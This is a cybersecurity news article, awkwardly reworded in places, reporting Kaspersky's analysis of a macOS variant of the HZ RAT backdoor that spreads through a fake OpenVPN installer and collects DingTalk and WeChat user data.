Apple macOS Edition of HZ RAT Malicious Backdoor Focuses on Users of Chinese Messaging Apps
The audience of Chinese instant messaging platforms like DingTalk and WeChat is the focal point of an Apple macOS variant of an insidious backdoor dubbed HZ RAT.
According to Kaspersky expert Sergey Puzan, the components “closely replicate the features of the Windows edition of the backdoor, differing solely in the payload, which is fetched as shell scripts from the hackers’ server.”stated.
The introduction of HZ RAT was initially chronicled by the German cybersecurity firm DCSO back in November 2022, with the malware propagated through self-extracting zip packages or malevolent RTF files seemingly constructed utilizing the Royal Road RTF weaponizer.
The attack sequences tied to RTF documents are devised to deploy the Windows variant of the malware, which is activated on the compromised machine by leveraging an obsolete Microsoft Office vulnerability in the Equation Editor (CVE-2017-11882).
On the contrary, the second distribution technique disguises itself as an installer for legitimate applications such as OpenVPN, PuTTYgen, or EasyConnect, which, apart from installing the decoy program, also triggers a Visual Basic Script (VBS) that launches the RAT.
The functionalities of HZ RAT are relatively straightforward as it links to a command-and-control (C2) server to fetch further directives. This encompasses running PowerShell commands and scripts, saving miscellaneous files to the system, uploading files to the server, and sending heartbeat signals.
Owing to the confined utility of the tool, suspicions arise that the malware is predominantly utilized for gathering credentials and conducting system reconnaissance operations.
Evidence indicates that the early versions of the malware were detected in the wild as early as June 2020. The operation itself, according to DCSO, is presumed to have been in motion since at least October 2020.
The latest variant discovered by Kaspersky, uploaded to VirusTotal in July 2023, poses as OpenVPN Connect (“OpenVPNConnect.pkg”), which once initiated, gets in touch with a C2 server specified in the backdoor to execute four fundamental commands that mirror those of its Windows equivalent –
- Execute shell commands (e.g., system information, local IP address, list of installed apps, data from DingTalk, Google Password Manager, and WeChat)
- Record a file to disk
- Dispatch a file to the C2 server
- Confirm a victim’s availability
“The malware makes an attempt to access the user’s WeChatID, email and phone number from WeChat,” Puzan noted. “Regarding DingTalk, attackers demonstrate an interest in acquiring more precise user information: Name of the organization and department where the user works, username, corporate email address, [and] phone number.”
Further scrutiny of the attack structure has exposed that nearly all the C2 servers are situated in China except for two, which are established in the U.S. and the Netherlands.
In addition, the ZIP archive encompassing the macOS setup package (“OpenVPNConnect.zip”) had purportedly been downloaded from a domain owned by a Chinese video game developer known as miHoYo, recognized for titles such as Genshin Impact and Honkai.
It remains nebulous how the file was uploaded to the said domain (“vpn.mihoyo[.]com”) and whether the server had been compromised previously. Moreover, the extent of the campaign remains undisclosed, but the persistence of the backdoor’s use over time suggests a certain level of accomplishment.
“The macOS version of HZ Rat we discovered delineates that the threat actors linked to the past assaults are still operational,” Puzan conveyed. “the malware was solely harvesting user data, yet it could potentially be utilized to propagate laterally across the victim’s network, as inferred by the presence of private IP addresses in some instances.”
About Author
